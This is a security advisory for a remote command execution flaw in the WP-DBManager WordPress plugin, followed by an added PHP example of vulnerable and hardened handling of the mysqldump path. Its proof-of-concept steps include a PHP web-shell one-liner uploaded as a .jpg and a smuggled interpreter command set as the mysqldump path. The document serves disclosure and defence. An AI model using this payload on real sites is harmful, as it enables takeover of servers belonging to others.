wpexploit WPEX-ID: 1C8C5861-CE87-4813-9E26-470D63C1903A
Author: Raad Haddad of Cloudyrion GmbH
Published: Jul 25, 2022 - 12:00 a.m.

WP-DBManager < 2.80.8 - Admin+ Remote Command Execution


EPSS: 0.001 (Low), Percentile: 43.1%

The plugin does not prevent administrators from running arbitrary commands on the server in multisite installations, where only super-administrators should be able to. The "Path To mysqldump" setting in DB Options is executed when a backup is run, so an administrator who controls that value controls the command that gets executed.

# Use any WordPress plugin that lets users upload files; a ".php" extension is not required, a ".jpg" is enough (many plugins allow such extensions)
# Upload your malicious file, for example test_rce.jpg, with the following content:

<?php system("COMMAND"); ?>

# Go to "DB Options" under the WP-DBManager plugin
# Set the "Path To mysqldump" option to the following payload (the PHP interpreter followed by the path of the uploaded file; the web root below is an example and must match the target):

/usr/bin/php /var/www/blog/test_rce.jpg

# Go to "Backup DB" and click the "Backup" button
# The command is executed without any issues
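The steps above work because the configured "Path To mysqldump" string is placed into a command line as-is, so "/usr/bin/php /var/www/blog/test_rce.jpg" is treated as an executable plus an argument. The following is an added example, not the plugin's own code or the fix shipped in 2.80.8: it contrasts that pattern with a validation routine that only accepts a bare, existing, executable file named mysqldump inside an allow-listed directory. The function names, the allow-listed directories and the "--no-create-db" argument are assumptions chosen for illustration.

```php
<?php
// Added example (not WP-DBManager code). Run with: php check_mysqldump_path.php

/**
 * Vulnerable pattern (illustrative): the configured path is concatenated
 * straight into the command, so an attacker-controlled value such as
 * "/usr/bin/php /var/www/blog/test_rce.jpg" becomes interpreter + script.
 */
function build_backup_command_vulnerable(string $mysqldump_path, string $db): string
{
    return $mysqldump_path . ' --no-create-db ' . escapeshellarg($db);
}

/**
 * Validation: returns the canonical path of an allowed mysqldump binary,
 * or null if the configured value must be rejected.
 *
 * - whitespace and shell metacharacters are rejected, so no extra arguments
 *   or chained commands can be smuggled in;
 * - the file must exist, be a regular file and be executable;
 * - its basename must be "mysqldump";
 * - it must live inside one of $allowed_dirs (assumed list, adjust per host).
 */
function validate_mysqldump_path(string $path, array $allowed_dirs): ?string
{
    if ($path === '' || preg_match('/[\s;&|`$<>(){}\'"\\\\]/', $path)) {
        return null;
    }
    $real = realpath($path);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;
    }
    if (basename($real) !== 'mysqldump') {
        return null;
    }
    foreach ($allowed_dirs as $dir) {
        $prefix = rtrim($dir, '/') . '/';
        if (strncmp($real, $prefix, strlen($prefix)) === 0) {
            return $real;
        }
    }
    return null;
}

/**
 * Hardened pattern: only a validated binary reaches the command line, and
 * it is still quoted so that nothing in the path is interpreted by the shell.
 */
function build_backup_command_hardened(string $configured_path, string $db): ?string
{
    $allowed = ['/usr/bin', '/usr/local/bin', '/usr/local/mysql/bin']; // assumption
    $bin = validate_mysqldump_path($configured_path, $allowed);
    if ($bin === null) {
        return null;
    }
    return escapeshellarg($bin) . ' --no-create-db ' . escapeshellarg($db);
}

// Demo with the payload from the advisory (the .jpg path is the advisory's example).
$payload = '/usr/bin/php /var/www/blog/test_rce.jpg';

echo "vulnerable: ", build_backup_command_vulnerable($payload, 'wordpress'), PHP_EOL;

$hardened = build_backup_command_hardened($payload, 'wordpress');
echo "hardened (payload): ", $hardened === null ? 'REJECTED' : $hardened, PHP_EOL;

// A legitimate value is accepted only if the binary really exists on this host.
$legit = build_backup_command_hardened('/usr/bin/mysqldump', 'wordpress');
echo "hardened (/usr/bin/mysqldump): ", $legit === null ? 'REJECTED (not present here)' : $legit, PHP_EOL;
```

Path validation alone addresses the command-string problem; the advisory's actual point is a capability one, so on multisite the handler that saves DB Options should additionally require a super-administrator (WordPress provides is_super_admin() for that check) before accepting any change to the mysqldump or mysql path settings.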
